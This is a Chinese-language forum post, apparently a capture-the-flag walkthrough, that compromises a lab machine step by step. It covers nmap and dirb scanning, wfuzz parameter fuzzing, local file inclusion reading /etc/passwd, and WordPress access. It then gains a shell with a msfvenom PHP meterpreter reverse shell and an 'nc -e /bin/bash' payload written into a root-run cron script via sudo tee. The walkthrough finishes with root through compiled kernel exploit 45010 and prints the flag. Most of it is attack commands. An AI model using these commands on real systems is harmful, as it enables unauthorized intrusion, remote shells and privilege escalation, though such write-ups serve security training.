Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Recommended Posts

一、ping扫描C段 nmap -sP    ————》获取IP   二、端口扫描 nmap  -p 1-65535 -A   ——》获取80  22端口
补充:端口扫描其他方法 netdiscover -p arp-scan ?   三、目录扫描 dirb   -->   获取index.php,image.php dirb -X .php,.txt,.zip   ———》获取secrt.txt文件 curl  ——》获取fuzz方法获取参数提醒,获取location.txt文件提醒
补充学习:目录扫描其他方法 nikto -host    四、FUZZ获取参数名  wfuzz -w /usr/share/wfuzz/wordlist/genrual/commom.txt wfuzz -C -w /usr/share/wfuzz/wordlist/genrual/commom.txt  --hw 12 ——》获取fuzz参数为file curl   ——》获取真实参数secrettier360
补充:fuzz的另一个应用场景——密码爆破 wfuzz -z file,user-dict(字典) -z file,pass-dict --hw 87 ""   五、LFI文件包含漏洞 curl ——》saket:x:1001:1001:find password.txt file in my directory:/home/saket: curl ——》follow_the_ippsec   六、登录wp vitor和follow_the_ippsec cmseek -u  ——》或者wordpress漏洞ThemeEditor wpscan --url --enumerate u   七、MSF生成payload反弹shell提权 1、 msfvenom -p php/meterpreter/reverse_tcp lhost= lport=7777 -o shell.php  ——》生成shell.php cat shell.php   放入网页上传 2、攻击机进入msfconsole msf6 > use exploit/multi/handler     //进入监听模块 set payload php/meterpreter/reverse_tcp set lhost set lport 7777 exploit   开始监听   触发: 进入meterpreter >  
补充:java脚本生成比较 msfvenom -p php/meterpreter/reverse_tcp lhost= lport=7777 -o shell.php msfvenom -p java/meterpreter/reverse_tcp lhost= lport=4444 -f war -o kali.war   补充2:nc的用法开启监听 通过tee命令将恶意脚本写入tidyup.sh(某一计划任务执行的文件) 1、echo "nc -e /bin/bash  5555" > shell.php 2、cat shell.php | sudo /usr/bin/tee  /usr/share/cleanup/tidyup.sh     //sudo具有sudo普通用户执行root权限  攻击机开启监听:        nc -lvvp 5555   八、搜索目标机操作系统漏洞 msf6 > searchsploit 16.04 Ubuntu linux/local/45010.c   cd /usr/share/exploitdb/exploits/linux/local/ cp 45010.c /root cd /root gcc 45010.c -o 45010   meterpreter >upload /root/45010 /tmp/45010     //漏洞上传到目录 meterpreter > shell            python -c 'import pty;pty.spawn("/bin/bash")'   //以交互界面显示 cd /tmp chmod +x 45010 ./45010 whoami root cd /root cat root.txt b2b17036da1de94cfb024540a8e7075a
Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...